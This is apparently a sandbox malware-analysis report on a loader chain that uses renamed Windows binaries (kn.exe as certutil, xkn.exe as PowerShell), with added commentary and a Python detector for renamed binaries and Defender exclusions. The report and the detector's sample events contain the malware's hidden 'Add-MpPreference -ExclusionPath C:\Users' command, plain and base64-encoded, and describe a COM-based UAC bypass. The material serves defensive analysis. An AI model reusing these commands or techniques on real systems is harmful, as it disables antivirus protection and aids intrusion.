Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED0D14 NCryptFinalizeKey,#205,#357,#357,25_2_00007FF67DED0D14
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEC2CF8 memset,#358,#357,CryptAcquireContextW,GetLastError,#357,#357,#358,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,DeleteFileW,LocalFree,#357,#357,#359,#359,LocalFree,LocalFree,#357,#357,#357,#357,#357,#359,#359,#359,#359,LocalFree,#359,#359,#357,25_2_00007FF67DEC2CF8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED2CFC CryptDestroyKey,#205,GetLastError,#357,SetLastError,25_2_00007FF67DED2CFC
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF06CE0 NCryptEnumStorageProviders,#360,25_2_00007FF67DF06CE0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE94CC0 #357,lstrcmpW,CryptEnumKeyIdentifierProperties,GetLastError,#357,LocalFree,#357,#359,LocalFree,LocalFree,free,25_2_00007FF67DE94CC0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEDACAC CryptContextAddRef,CryptDuplicateKey,#205,GetLastError,#357,#357,SetLastError,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,??3@YAXPEAX@Z,25_2_00007FF67DEDACAC
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEC4CA0 CryptAcquireCertificatePrivateKey,GetLastError,#357,CertGetCRLContextProperty,GetLastError,#357,CryptGetUserKey,GetLastError,GetLastError,#357,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,25_2_00007FF67DEC4CA0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF06C88 NCryptEnumAlgorithms,#360,25_2_00007FF67DF06C88
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED2C80 CryptDestroyHash,#205,GetLastError,#357,SetLastError,25_2_00007FF67DED2C80
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF0A9F0 strcmp,GetLastError,CryptFindOIDInfo,#357,#357,LocalFree,#357,#357,NCryptIsAlgSupported,#360,#357,LocalAlloc,memmove,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,LocalFree,LocalFree,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalFree,GetLastError,#357,LocalFree,GetLastError,#357,LocalFree,GetLastError,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,25_2_00007FF67DF0A9F0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE36C4C CryptFindOIDInfo,#357,#357,#359,CryptFindOIDInfo,#357,LocalFree,25_2_00007FF67DE36C4C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED0C3C NCryptExportKey,#205,#359,#359,#357,25_2_00007FF67DED0C3C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF06C30 NCryptOpenStorageProvider,#360,25_2_00007FF67DF06C30
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE6CC24 CryptDecodeObjectEx,#359,BCryptSetProperty,BCryptGetProperty,#357,BCryptDestroyKey,BCryptCloseAlgorithmProvider,25_2_00007FF67DE6CC24
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF00BF4 CryptDuplicateHash,GetLastError,#357,CryptGetHashParam,GetLastError,#203,CryptDestroyHash,25_2_00007FF67DF00BF4
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED2BC0 CryptCreateHash,#205,GetLastError,#357,#357,#357,SetLastError,25_2_00007FF67DED2BC0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEFCBB4 CryptGetProvParam,GetLastError,#358,LocalAlloc,#357,CryptGetProvParam,GetLastError,#357,LocalFree,25_2_00007FF67DEFCBB4
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE5CB98 NCryptIsKeyHandle,GetLastError,#358,#360,NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,#359,LocalFree,NCryptIsKeyHandle,CryptGetUserKey,GetLastError,#357,CryptGetKeyParam,GetLastError,#359,CryptDestroyKey,NCryptIsKeyHandle,#359,NCryptIsKeyHandle,25_2_00007FF67DE5CB98
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF00B9C CryptHashData,GetLastError,#357,25_2_00007FF67DF00B9C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED0B80 NCryptCreatePersistedKey,#205,#359,#359,#357,25_2_00007FF67DED0B80
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF0A740 CryptAcquireContextW,GetLastError,#357,CryptImportKey,GetLastError,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,CryptGetUserKey,GetLastError,CryptDestroyKey,#357,CryptDestroyKey,CryptReleaseContext,25_2_00007FF67DF0A740
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEC2724 CryptDecodeObject,GetLastError,#357,25_2_00007FF67DEC2724
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE726E0 #357,#357,LocalAlloc,memmove,memset,#357,BCryptFreeBuffer,#357,#357,#357,25_2_00007FF67DE726E0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEF86D8 CertFindCertificateInStore,CryptAcquireCertificatePrivateKey,GetLastError,#359,CertFindCertificateInStore,GetLastError,#359,#357,CertFreeCertificateContext,25_2_00007FF67DEF86D8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF066D8 NCryptFreeObject,#360,25_2_00007FF67DF066D8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEA4694 CertFindAttribute,CryptHashCertificate2,memcmp,#357,25_2_00007FF67DEA4694
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE66694 CryptQueryObject,GetLastError,#359,#357,#357,LocalFree,CertCloseStore,CryptMsgClose,25_2_00007FF67DE66694
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF08814 NCryptIsKeyHandle,NCryptIsKeyHandle,#357,#359,#357,CryptFindOIDInfo,LocalAlloc,#357,LocalAlloc,#357,CryptFindOIDInfo,#359,LocalAlloc,#357,memmove,LocalFree,#357,25_2_00007FF67DF08814
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF06654 NCryptGetProperty,#360,25_2_00007FF67DF06654
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE9A654 CryptVerifyCertificateSignature,GetLastError,#358,CertVerifyTimeValidity,CertOpenStore,GetLastError,#357,CryptVerifyCertificateSignature,CertVerifyRevocation,GetLastError,#357,CertCloseStore,25_2_00007FF67DE9A654
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE60630 #357,CryptDecodeObject,GetLastError,#357,GetLastError,GetLastError,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,25_2_00007FF67DE60630
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE58600 #357,CryptDecodeObject,GetLastError,LocalFree,25_2_00007FF67DE58600
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE925E8 #357,#357,#357,CryptImportKey,GetLastError,#358,#357,CryptSetKeyParam,LocalFree,GetLastError,#357,#357,#357,CertFreeCertificateContext,CryptDestroyKey,25_2_00007FF67DE925E8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE5C5D4 NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,#357,#357,#357,#357,LocalFree,LocalFree,25_2_00007FF67DE5C5D4
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF3E8B0 CryptDecodeObjectEx,GetLastError,CryptBinaryToStringW,GetLastError,memset,CryptBinaryToStringW,??3@YAXPEAX@Z,LocalFree,25_2_00007FF67DF3E8B0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED65B4 NCryptIsKeyHandle,_CxxThrowException,25_2_00007FF67DED65B4
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DECE57C CertOpenStore,GetLastError,#357,CertAddEncodedCertificateToStore,GetLastError,#358,CryptFindCertificateKeyProvInfo,GetLastError,#358,#357,CertSetCTLContextProperty,GetLastError,CryptAcquireCertificatePrivateKey,GetLastError,CertSetCTLContextProperty,GetLastError,LocalFree,CertFreeCertificateContext,CertCloseStore,25_2_00007FF67DECE57C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF04914 GetLastError,#359,CryptGetUserKey,CryptGetUserKey,GetLastError,#357,CryptDestroyKey,CryptReleaseContext,25_2_00007FF67DF04914
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEBE914 CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,GetLastError,GetLastError,GetLastError,#357,CryptDestroyHash,25_2_00007FF67DEBE914
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED08EC BCryptGetProperty,#205,#359,#357,#357,25_2_00007FF67DED08EC
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF3A58C NCryptOpenStorageProvider,NCryptOpenKey,NCryptGetProperty,GetProcessHeap,HeapAlloc,NCryptGetProperty,NCryptFreeObject,NCryptFreeObject,25_2_00007FF67DF3A58C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF0A590 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,25_2_00007FF67DF0A590
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE4A8CC CryptFindLocalizedName,CertEnumCertificatesInStore,CertFindCertificateInStore,CertGetCRLContextProperty,#357,#357,#357,CertEnumCertificatesInStore,25_2_00007FF67DE4A8CC
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED0844 BCryptExportKey,#205,#359,#357,#357,25_2_00007FF67DED0844
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE56824 CryptHashCertificate,GetLastError,#357,25_2_00007FF67DE56824
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEBC7F0 GetLastError,#357,CertOpenStore,GetLastError,CertEnumCertificatesInStore,CertCompareCertificateName,CertFindExtension,CryptDecodeObject,GetLastError,#357,CertGetCRLContextProperty,GetLastError,#357,CertSetCTLContextProperty,GetLastError,#357,GetSystemTimeAsFileTime,I_CryptCreateLruEntry,GetLastError,#357,I_CryptInsertLruEntry,I_CryptReleaseLruEntry,GetLastError,#357,CertEnumCertificatesInStore,I_CryptCreateLruEntry,GetLastError,#357,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,CertFreeCertificateChain,GetLastError,I_CryptInsertLruEntry,I_CryptReleaseLruEntry,#357,CertCloseStore,CertFreeCertificateContext,25_2_00007FF67DEBC7F0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED07F4 BCryptDestroyKey,#205,#357,25_2_00007FF67DED07F4
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE367CC LocalAlloc,#357,GetSystemTimeAsFileTime,LocalAlloc,#357,LocalAlloc,#357,memmove,memcmp,CryptEncodeObjectEx,memmove,LocalFree,GetLastError,#357,#359,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,25_2_00007FF67DE367CC
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEE07D0 memset,#357,#360,#359,#357,#358,LoadCursorW,SetCursor,#360,#358,CertGetPublicKeyLength,GetLastError,#357,strcmp,GetLastError,#357,CryptFindOIDInfo,#357,#357,LocalFree,#357,LocalFree,#358,#358,#357,SetCursor,SetCursor,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,#357,#225,#359,#359,#357,#359,LocalFree,#359,#223,#359,#357,#223,#359,#359,#359,DialogBoxParamW,SysStringByteLen,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,SysFreeString,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,25_2_00007FF67DEE07D0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEC27BC _strnicmp,#357,#357,#357,#357,CryptDecodeObject,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,25_2_00007FF67DEC27BC
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED07A4 BCryptDestroyHash,#205,#357,25_2_00007FF67DED07A4
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED0740 BCryptCloseAlgorithmProvider,#205,#357,#357,25_2_00007FF67DED0740
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE70300 NCryptOpenStorageProvider,#357,#357,#357,#357,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,NCryptFreeObject,#357,25_2_00007FF67DE70300
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEA6280 #357,#254,#357,CertGetCRLContextProperty,GetLastError,memcmp,#254,#357,#360,#360,CertGetPublicKeyLength,GetLastError,#359,strcmp,GetLastError,CryptFindOIDInfo,#357,LocalFree,CryptFindOIDInfo,#357,#357,#359,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,25_2_00007FF67DEA6280
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEF2278 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,LocalAlloc,memmove,#357,#357,CryptDestroyHash,CryptReleaseContext,25_2_00007FF67DEF2278
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEFE274 GetLastError,#358,CryptAcquireCertificatePrivateKey,GetLastError,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,LocalFree,NCryptIsKeyHandle,GetLastError,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,25_2_00007FF67DEFE274
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF08404 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,25_2_00007FF67DF08404
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DECE1F8 CertSaveStore,GetLastError,LocalAlloc,#357,CertSaveStore,GetLastError,#357,LocalFree,#357,#357,NCryptOpenStorageProvider,NCryptImportKey,NCryptSetProperty,NCryptFinalizeKey,LocalFree,LocalFree,NCryptFreeObject,25_2_00007FF67DECE1F8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEBA1E8 LocalFree,CryptHashCertificate2,CertGetCRLContextProperty,CertGetNameStringA,memmove,memmove,GetLastError,GetLastError,#357,GetLastError,#357,GetLastError,GetLastError,GetLastError,#357,LocalFree,memmove,GetLastError,#357,GetLastError,#359,LocalFree,25_2_00007FF67DEBA1E8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEF61AC SysStringLen,SysStringLen,CryptStringToBinaryW,GetLastError,#357,25_2_00007FF67DEF61AC
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE721A4 #360,#359,#357,#357,BCryptFreeBuffer,25_2_00007FF67DE721A4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEB6194 CryptQueryObject,GetLastError,CertEnumCertificatesInStore,CertAddStoreToCollection,GetLastError,#357,CertCloseStore,CertFreeCertificateContext,25_2_00007FF67DEB6194
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE9417C #360,#360,#359,#357,#357,#357,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,LocalFree,LocalFree,LocalFree,CryptDestroyKey,25_2_00007FF67DE9417C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF3613C CryptDecodeObjectEx,25_2_00007FF67DF3613C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEFE516 ??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalFree,NCryptIsKeyHandle,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,25_2_00007FF67DEFE516
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE5C514 CryptGetProvParam,SetLastError,LocalAlloc,LocalFree,25_2_00007FF67DE5C514
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE444E0 #357,#256,#357,GetLastError,CryptImportPublicKeyInfoEx2,GetLastError,CryptHashCertificate2,GetLastError,#357,LocalAlloc,GetLastError,memmove,BCryptVerifySignature,BCryptVerifySignature,BCryptDestroyKey,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,25_2_00007FF67DE444E0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEA24D4 #357,CertCompareCertificateName,CertCompareCertificateName,GetSystemTime,SystemTimeToFileTime,GetLastError,#357,CompareFileTime,CompareFileTime,CompareFileTime,CompareFileTime,CryptVerifyCertificateSignature,GetLastError,#357,strcmp,strcmp,#357,#357,#357,CertCompareCertificateName,#357,CertCompareCertificateName,#357,CertFreeCTLContext,25_2_00007FF67DEA24D4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEC8488 #357,CertGetCertificateChain,GetLastError,LocalAlloc,CertGetCRLContextProperty,GetLastError,GetLastError,GetLastError,CryptAcquireContextW,GetLastError,memset,CryptMsgOpenToEncode,GetLastError,CryptMsgUpdate,GetLastError,#357,#357,CryptReleaseContext,CryptMsgClose,CertCloseStore,CertFreeCertificateChain,LocalFree,LocalFree,LocalFree,25_2_00007FF67DEC8488
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF0A1F8 LocalAlloc,CryptEnumProvidersA,GetLastError,#358,LocalFree,#357,25_2_00007FF67DF0A1F8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF36214 CryptDecodeObjectEx,CryptDecodeObjectEx,SetLastError,25_2_00007FF67DF36214
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEAA450 #357,#358,#357,#223,SetLastError,SetLastError,memmove,memmove,#357,#357,GetLastError,#357,#357,strcmp,GetLastError,strcmp,strcmp,strcmp,qsort,#357,CompareFileTime,CompareFileTime,#357,#357,CertFreeCertificateContext,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertCloseStore,CertCloseStore,CertFreeCTLContext,LocalFree,free,25_2_00007FF67DEAA450
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEAC450 CertOpenStore,GetLastError,#357,CryptQueryObject,CertAddStoreToCollection,GetLastError,#357,CertAddStoreToCollection,GetLastError,CertOpenStore,GetLastError,CertAddStoreToCollection,GetLastError,CertCloseStore,CertCloseStore,CertCloseStore,CertCloseStore,25_2_00007FF67DEAC450
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE54410 GetUserDefaultUILanguage,GetSystemDefaultUILanguage,#357,#357,CryptFindOIDInfo,CryptEnumOIDInfo,#360,CryptFindOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,CryptEnumOIDInfo,#258,#358,#357,#357,#357,LocalFree,#224,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,25_2_00007FF67DE54410
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE723E8 BCryptResolveProviders,#360,#360,BCryptFreeBuffer,25_2_00007FF67DE723E8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF08298 #357,CryptFindOIDInfo,LocalAlloc,#357,memmove,25_2_00007FF67DF08298
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE5E3B0 #357,#357,CryptDecodeObject,LocalFree,25_2_00007FF67DE5E3B0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF3A2E0 NCryptOpenStorageProvider,NCryptOpenKey,NCryptFreeObject,25_2_00007FF67DF3A2E0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEC6374 memset,#358,#357,LocalFree,LocalFree,#357,#357,_strlwr,#357,LocalFree,LocalFree,lstrcmpW,#359,#359,#357,CryptAcquireContextW,GetLastError,#256,CryptGenRandom,GetLastError,#254,#357,fopen,fopen,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,LocalAlloc,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,#357,LocalFree,#357,fprintf,fprintf,CertOpenStore,GetLastError,LocalAlloc,CertSaveStore,GetLastError,#357,CertCloseStore,CertFreeCertificateContext,CertFreeCertificateContext,fclose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,CryptReleaseContext,fprintf,fprintf,fflush,ferror,25_2_00007FF67DEC6374
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEC2358 #357,#357,CryptReleaseContext,CryptReleaseContext,CertFreeCertificateContext,CertFreeCertificateContext,25_2_00007FF67DEC2358
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA23837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,28_2_1BA23837
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_21093837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,36_2_21093837
                    Source: sppsvc.pif, 0000001C.00000002.4524424593.000000001BA5B000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY-----

                    Exploits

                    Source: Yara match | File source: 36.2.Kpeyvroh.PIF.21060000.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 36.2.Kpeyvroh.PIF.21060000.4.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000024.00000002.2461262597.000000007E9A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000024.00000002.2446139449.0000000021060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: Kpeyvroh.PIF PID: 7552, type: MEMORYSTR

                    Privilege Escalation

                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIF | Code function: 36_2_210674FD _wcslen,CoGetObject,36_2_210674FD
                    Source: C:\Users\Public\ger.exe | Registry value created: NULL C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users
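The two entries above are the escalation-and-evasion step of this chain. Kpeyvroh.PIF calls CoGetObject, the COM call that the CMSTPLUA elevated-moniker UAC bypass listed in the summary relies on, and ger.exe, which carries the reg.pdb debug path and is therefore a renamed reg.exe, writes a registry value whose data launches xkn.exe, a renamed powershell.exe (powershell.pdb), with Add-MpPreference -ExclusionPath C:\Users. That exclusion covers every user profile and C:\Users\Public, so everything the loader drops afterwards is excluded from Defender scanning. The same renaming trick applies to alpha.exe (cmd.pdb) and kn.exe (certutil.pdb). The Python below is an added example written for this page, not part of the Joe Sandbox report or of the malware; it shows how both the renamed binaries and the exclusion command can be caught from process-creation telemetry. It assumes Sysmon Event ID 1 style records with Image, OriginalFileName and CommandLine fields (OriginalFileName is read from the PE version resource, so it survives a copy-and-rename on disk). The sample events are constructed to mirror this chain, with command-line arguments omitted where the report does not show them, and the base64 variant illustrates the encoded form that the "Powershell Base64 Encoded MpPreference Cmdlet" Sigma rule in the summary targets.

```python
"""Catch renamed system binaries and Defender exclusion tampering in process-creation events.

Added example for this page, not part of the Joe Sandbox report. Assumes Sysmon
Event ID 1 style records (Image, OriginalFileName, CommandLine); the events in
SAMPLE_EVENTS are constructed to mirror the chain this report shows.
"""
import base64
import binascii
import ntpath
import re

# User-writable directories from which copies of signed system binaries rarely run legitimately.
SUSPICIOUS_DIRS = ("c:\\users\\public\\", "\\appdata\\local\\temp\\",
                   "c:\\windows\\temp\\", "c:\\programdata\\")

# Add-/Set-MpPreference followed by any -Exclusion* parameter (Path, Process, Extension, ...).
MP_EXCLUSION = re.compile(r"\b(?:Add|Set)-MpPreference\b.*?-Exclusion\w*", re.I)

# -EncodedCommand and the abbreviations PowerShell accepts for it, followed by base64 text.
ENCODED_ARG = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def encode_powershell_command(text):
    """Produce an -EncodedCommand argument the way PowerShell expects it: base64 of UTF-16LE."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Recover the script text hidden behind -EncodedCommand, or None if there is none."""
    match = ENCODED_ARG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def _stem(path):
    """'C:\\Users\\Public\\alpha.exe' -> 'alpha'; 'Cmd.Exe' -> 'cmd'."""
    return ntpath.splitext(ntpath.basename(path))[0].lower()


def analyze(event):
    """Return the detections that fire for one process-creation event (empty list if none)."""
    image = event["Image"]
    findings = []
    if any(d in image.lower() for d in SUSPICIOUS_DIRS):
        findings.append("execution_from_suspicious_folder")
    # OriginalFileName comes from the PE version resource, so a copy of cmd.exe named
    # alpha.exe still reports Cmd.Exe; a mismatch with the on-disk name is the rename signal.
    original = event.get("OriginalFileName", "")
    if original and _stem(original) != _stem(image):
        findings.append("renamed_system_binary:" + _stem(original))
    cmdline = event.get("CommandLine", "")
    decoded = decode_encoded_command(cmdline) or ""
    if MP_EXCLUSION.search(cmdline) or MP_EXCLUSION.search(decoded):
        findings.append("defender_exclusion_added")
    return findings


def triage(events):
    """Return (Image, findings) for every event that produced at least one detection."""
    results = []
    for event in events:
        findings = analyze(event)
        if findings:
            results.append((event["Image"], findings))
    return results


# Constructed sample telemetry modelled on this report; arguments the report does not show are omitted.
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\Public\alpha.exe", "OriginalFileName": "Cmd.Exe",
     "CommandLine": r"C:\Users\Public\alpha.exe"},
    {"Image": r"C:\Users\Public\xkn.exe", "OriginalFileName": "PowerShell.EXE",
     "CommandLine": r"C:\Users\Public\xkn.exe -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users"},
    {"Image": r"C:\Users\Public\xkn.exe", "OriginalFileName": "PowerShell.EXE",
     "CommandLine": r"C:\Users\Public\xkn.exe -WindowStyle hidden -enc "
                    + encode_powershell_command(r"Add-MpPreference -ExclusionPath C:\Users")},
    {"Image": r"C:\Users\Public\kn.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": r"C:\Users\Public\kn.exe"},
    {"Image": r"C:\Users\Public\ger.exe", "OriginalFileName": "reg.exe",
     "CommandLine": r"C:\Users\Public\ger.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "OriginalFileName": "PowerShell.EXE", "CommandLine": "powershell.exe -Command Get-Process"},
]

if __name__ == "__main__":
    for image, findings in triage(SAMPLE_EVENTS):
        print(image, "->", ", ".join(findings))
```

The rename check is the durable part: the attacker controls the file name and the folder, but not the version resource of the Microsoft binary being copied, so a Sysmon (or EDR) OriginalFileName that disagrees with the image name is hard to avoid without patching the binary and breaking its signature. The folder check on its own generates noise from installers; the exclusion check should fire regardless of where PowerShell runs from, since a legitimate administrator excluding all of C:\Users is itself worth a ticket.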
                    Source: unknown | HTTPS traffic detected: 23.35.153.42:443 -> 192.168.2.5:49717 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 23.204.76.112:443 -> 192.168.2.5:49719 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 23.204.76.112:443 -> 192.168.2.5:49720 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.5:49721 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 142.250.217.193:443 -> 192.168.2.5:49729 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.5:49732 version: TLS 1.2
